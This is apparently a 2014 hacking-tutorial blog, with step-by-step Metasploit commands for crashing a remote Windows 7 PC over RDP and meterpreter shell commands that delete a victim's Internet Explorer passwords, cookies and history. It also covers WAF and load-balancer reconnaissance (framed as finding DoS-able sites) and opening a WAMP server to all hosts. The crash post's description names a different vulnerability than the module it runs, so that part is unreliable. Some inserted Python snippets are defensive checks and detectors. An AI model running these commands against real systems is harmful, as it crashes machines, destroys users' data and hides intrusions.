Saturday, April 5, 2014

How to Perform Blue Screen Death Attack on Remote Windows 7 PC



This Metasploit module exploits a vulnerability in win32k.sys where, under specific conditions, TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1.

Now open a Kali Linux terminal and type msfconsole.


Now type: use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options


msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.105
msf auxiliary(ms12_020_maxchannelids) > show options

msf auxiliary(ms12_020_maxchannelids) > exploit


Thursday, April 3, 2014

Firewall Detection Tool Wafw00f



Introduction

This is a Web Application Firewall detection tool.
The tool was written by Sandro Gauci and G. Henrique.

It will help you detect the WAF (Web Application Firewall) behind any domain.
Wiffit (Wafw00f) can test for the firewalls listed in the image.
If any firewall from the list is detected, it will be displayed on screen.

How Wiffit (Wafw00f) detects a Web Application Firewall (WAF)
To detect a WAF it looks for the following things:
  • Cookies
  • Server Cloaking
  • Response Codes
  • Drop Action
  • Pre-Built-In Rules
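To make those signals concrete, here is an added example (not wafw00f's own code) that applies the cookie, server-cloaking and response-code checks to a constructed HTTP response, which is also a quick way to see what fingerprint your own WAF leaks. The signature table is an assumption for the example, not wafw00f's database; the Imperva/Incapsula cookie names match the vendor reported in Example 1 below.

```python
# Added example (not wafw00f's own code): apply the detection signals the post
# lists (cookies, server cloaking, response codes / drop action) to a constructed
# HTTP response, e.g. to see what fingerprint your own WAF leaks to scanners.
import re

# Cookie-name prefixes and Server strings set by some WAF/CDN products. The
# Imperva/Incapsula names match the vendor the post reports; the table itself
# is an assumption for this example, not wafw00f's signature database.
COOKIE_SIGNATURES = {
    r"^incap_ses_": "Imperva Incapsula",
    r"^visid_incap_": "Imperva Incapsula",
    r"^__cfduid$": "Cloudflare",
    r"^citrix_ns_id": "Citrix NetScaler",
}
SERVER_SIGNATURES = {r"cloudflare": "Cloudflare", r"barracuda": "Barracuda"}

def detect_waf(status, headers, probe_status=None):
    """Fingerprint from a normal response (status, lower-cased header dict with
    'set-cookie' as a list) plus the status a probe request got (None = dropped)."""
    findings = {"vendor": None, "signals": []}
    # Cookies: compare each Set-Cookie name against the vendor table.
    for raw in headers.get("set-cookie", []):
        name = raw.split("=", 1)[0].strip()
        for pattern, vendor in COOKIE_SIGNATURES.items():
            if re.search(pattern, name, re.I):
                findings["vendor"] = findings["vendor"] or vendor
                findings["signals"].append("cookie:" + name)
    # Server cloaking: the Server header is blank/missing or names a WAF product.
    server = headers.get("server", "")
    if not server:
        findings["signals"].append("server-cloaking")
    for pattern, vendor in SERVER_SIGNATURES.items():
        if re.search(pattern, server, re.I):
            findings["vendor"] = findings["vendor"] or vendor
            findings["signals"].append("server:" + server)
    # Response codes / drop action: the normal request succeeds while the probe
    # is answered with an error code or gets no reply at all.
    if status < 400 and probe_status is None:
        findings["signals"].append("drop-action")
    elif status < 400 and probe_status >= 400:
        findings["signals"].append("response-code:%d" % probe_status)
    return findings

# Constructed sample response modelled on the Imperva result in the post.
SAMPLE_HEADERS = {
    "server": "",
    "set-cookie": ["visid_incap_123=abc; Path=/", "incap_ses_45_123=def; Path=/"],
}
```

Calling detect_waf(200, SAMPLE_HEADERS, probe_status=403) reports Imperva Incapsula from the cookies, a blank Server header and the 403 on the probe.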

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is now open; see the image below for more details.

How to use wafw00f

Example 1:
Usage:
  root@root: wafw00f [target url]
Example:
  wafw00f www.***.com
  • This example shows that www.***.com is behind a Web Application Firewall.
  • www.***.com is behind the Imperva WAF.


Example 2 :
  • Here google.com is also behind a WAF.
  • All these images show that these websites are using an IDS, and it blocks my request every time.


Example 3 :
  • Flipkart is also using a WAF (Web Application Firewall).

Example 4: wafw00f -a http://www.google.com/
Nothing found there either.


Example 5: wafw00f -l -t http://www.google.com/
Nothing found there either.


Wednesday, April 2, 2014

Load Balancing Detector (lbd)



Introduction

Load Balancing Detector (lbd) is a tool which checks whether a given domain uses load balancing or not. This tool is mainly used by pentesters and hackers to check whether a site is DoS-able or not.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it:
Open lbd through Kali Linux >> Information Gathering >> IDS IPS Identification >> lbd

How to use it:
  • To use it, you have to run this command: /usr/bin/lbd [domain]
  • This tool first scans for DNS load balancing and then for HTTP load balancing.
  • At last, it shows the result.
Usage: root@VH0:~# /usr/bin/lbd www.*********.com



Usage: root@VH0:~# /usr/bin/lbd www.google.com
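The two checks lbd runs, reproduced as an added example (not lbd's own code) on constructed data so the logic can be inspected without touching a live host. It assumes the same heuristics the post describes: several A records for DNS load balancing, and Server or Date headers that differ between consecutive responses for HTTP load balancing; the sample addresses and headers are constructed.

```python
# Added example (not lbd's own code): the DNS and HTTP load-balancing checks
# the post describes, run on constructed data. A Date header that goes
# backwards between consecutive replies means they came from machines with
# different clocks, i.e. more than one backend.
from email.utils import parsedate_to_datetime

def dns_load_balanced(addresses):
    """True when the name resolves to more than one distinct address."""
    return len(set(addresses)) > 1

def http_load_balanced(responses):
    """responses: header dicts (lower-case keys) from repeated requests to
    the same URL, in the order received. Returns (balanced, reasons)."""
    reasons = []
    servers = {r.get("server", "") for r in responses}
    if len(servers) > 1:
        reasons.append("server header varies: %s" % sorted(servers))
    # Compare Date headers pairwise; a reply dated earlier than the previous
    # one cannot have come from the same backend clock.
    dates = [parsedate_to_datetime(r["date"]) for r in responses if "date" in r]
    for prev, cur in zip(dates, dates[1:]):
        if cur < prev:
            reasons.append("date header went backwards (%s < %s)"
                           % (cur.time(), prev.time()))
            break
    return bool(reasons), reasons

# Constructed samples: DNS answers and headers for a single-origin site and
# for a balanced one (not real traffic).
SINGLE_ADDRS = ["192.0.2.10", "192.0.2.10", "192.0.2.10"]
BALANCED_ADDRS = ["192.0.2.10", "192.0.2.11", "192.0.2.12"]
SINGLE_ORIGIN = [
    {"server": "Apache/2.2.11", "date": "Wed, 02 Apr 2014 10:00:00 GMT"},
    {"server": "Apache/2.2.11", "date": "Wed, 02 Apr 2014 10:00:01 GMT"},
    {"server": "Apache/2.2.11", "date": "Wed, 02 Apr 2014 10:00:02 GMT"},
]
BALANCED = [
    {"server": "gws", "date": "Wed, 02 Apr 2014 10:00:00 GMT"},
    {"server": "gws", "date": "Wed, 02 Apr 2014 09:59:58 GMT"},
    {"server": "nginx", "date": "Wed, 02 Apr 2014 10:00:01 GMT"},
]
```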

Monday, March 31, 2014

How to Access WAMP Server in LAN or WAN


Introduction

The WAMP server is very useful and is widely used open source software. It works great when you are working on a local machine. But when you want to access the same WAMP server from a different machine on the LAN or WAN, it is not possible.

Background 

Consider that you are working in a team on a big project where each member of the team works on a different module against the same database. Issues arise when you merge files as well as the database. The best solution is to implement SVN on your server (for checking in and checking out files and folders, etc.) and ask all team members to access that server instance.

How to do this

Here are the steps to make WAMP accessible on the LAN or WAN:

Step 1

First you need to set up the WAMP server on your machine with the required services, and make sure that your WAMP server is online and reachable in your browser at http://localhost:8081/ (I have given my WAMP server a fixed port number, 8081).

To run the WAMP Apache server on your chosen port, do the following. Open the \wamp\bin\apache\Apache2.2.11\conf\httpd.conf file, search for “#Listen”, and change the port from 80 to 8081; your URL will then be http://localhost:8081/. Like below:
#Listen 12.34.56.78:80
Listen 192.168.1.154:8081

Step 2

Now, to make the WAMP server accessible on the LAN or WAN, open \wamp\bin\apache\Apache2.2.11\conf\httpd.conf and find the following code:
<Directory "cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Deny from all
</Directory>
And change the above code to:
<Directory "cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

Step 3

Now you have to bind the server's static IP to the port number (remember we have done this at the start). For this, stay in the same file and change “Listen 8081” to “Listen [IP address of server]:8081”. It will look like “Listen 192.168.1.154:8081”.
Listen 192.168.1.154:8081

Step 4

Great! The next step is to open port 8081 on the server so that everyone can access it. This depends on which OS you are using. For example, if you are using Windows Vista, follow the steps below.
Open Control Panel >> System and Security >> Windows Firewall, then click on “Advanced Settings”, select “Inbound Rules” from the left panel and click on “Add Rule…”. Select “Port” as the option from the list, then on the next screen select the “TCP” protocol and enter port number “8081” under “Specific local ports”, click the “Next” button, select “Allow the Connection”, then give the rule a general name and description and click Done.
Now you are done with opening the port as well.
Next, “Restart All Services” in WAMP and access your machine on the LAN or WAN.
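Once Listen is bound to the LAN address, a <Directory> block that says “Allow from all” (here cgi-bin, so any CGI scripts) is reachable by every host that can hit the port, not only your team. Below is an added check (not part of the original post) that reads an httpd.conf fragment and flags exactly that combination; it assumes Apache 2.2 access-control syntax (Order/Allow/Deny) as in the post, and the trusted subnet 192.168.1.0/24 is a placeholder to replace with your own.

```python
# Added example (not part of the original post): flag a non-loopback Listen
# combined with a <Directory> that allows access from all hosts, and suggest
# limiting it to the team's subnet. Assumes Apache 2.2 syntax (Order/Allow/
# Deny) as used in the post; the subnet default is a placeholder.
import re

def audit_httpd_conf(conf_text, trusted_subnet="192.168.1.0/24"):
    """Return a list of warnings for non-loopback Listen + 'Allow from all'."""
    warnings = []
    listens = re.findall(r"^\s*Listen\s+(\S+)", conf_text, re.M)
    # A Listen with no host, or a non-loopback host, is reachable from the network.
    exposed = [l for l in listens
               if not l.startswith(("127.", "localhost", "[::1]"))]
    if not exposed:
        return warnings
    for m in re.finditer(r'<Directory\s+"?([^">]+)"?>(.*?)</Directory>',
                         conf_text, re.S | re.I):
        path, body = m.group(1), m.group(2)
        if re.search(r"^\s*Allow\s+from\s+all\b", body, re.M | re.I):
            warnings.append(
                'Listen %s and <Directory "%s"> allow from all: replace with '
                '"Allow from %s"' % (", ".join(exposed), path, trusted_subnet))
    return warnings

# Constructed fragment following the post's edited configuration.
SAMPLE_CONF = """
Listen 192.168.1.154:8081
<Directory "cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>
"""
```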


How to Delete Passwords/Cookies/History/Temp Internet File of Internet Explorer in Remote Victim PC Using Metasploit


Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target.
Delete Temporary Internet Files
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
Delete Cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

Delete History
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

Delete Form Data
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

Delete Passwords
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

Delete All
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

Delete All + files and settings stored by Add-ons
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
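From the defender's side, these commands are easy to spot in process-creation telemetry. The following added example (not part of the original post) runs detection logic over constructed Sysmon-style log lines and decodes the ClearMyTracksByProcess value into the categories listed above; the 4096 “add-on data” bit is derived from the post's 4351 minus 255, and the log lines are constructed samples, not real telemetry.

```python
# Added example (not part of the original post): detection logic a defender can
# run over process-creation logs to spot the commands above. It parses a
# constructed, Sysmon-style "CommandLine: ..." field and decodes the
# ClearMyTracksByProcess flag value into the categories the post lists. The
# 4096 "add-on data" bit is derived from the post's 4351 - 255; the log lines
# are constructed samples, not real telemetry.
import re

FLAGS = {1: "history", 2: "cookies", 8: "temporary internet files",
         16: "form data", 32: "passwords", 4096: "add-on data"}

def decode_flags(value):
    """Map a ClearMyTracksByProcess value to the categories it clears."""
    if value & 255 == 255:          # 255 / 4351: the 'delete all' forms in the post
        cats = ["all"]
        value &= ~255
    else:
        cats = []
    cats += [name for bit, name in FLAGS.items() if value & bit]
    rest = value & ~sum(FLAGS)      # bits the post does not document
    if rest:
        cats.append("unknown bits %d" % rest)
    return cats

CMD_RE = re.compile(r"rundll32(?:\.exe)?\s+inetcpl\.cpl\s*,\s*ClearMyTracksByProcess\s+(\d+)",
                    re.I)

def detect_clear_tracks(log_lines):
    """Return (line_number, user, categories) for every matching log line."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = CMD_RE.search(line)
        if m:
            user = re.search(r"User:\s*(\S+)", line)
            hits.append((n, user.group(1) if user else "?",
                         decode_flags(int(m.group(1)))))
    return hits

# Constructed sample log lines (Sysmon event 1 style, flattened to one line each).
SAMPLE_LOG = [
    "Event 1 | User: LAB\\alice | Image: C:\\Windows\\System32\\notepad.exe | CommandLine: notepad.exe",
    "Event 1 | User: LAB\\alice | Image: C:\\Windows\\System32\\rundll32.exe | "
    "CommandLine: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32",
    "Event 1 | User: LAB\\bob | Image: C:\\Windows\\System32\\rundll32.exe | "
    "CommandLine: RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351",
]
```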

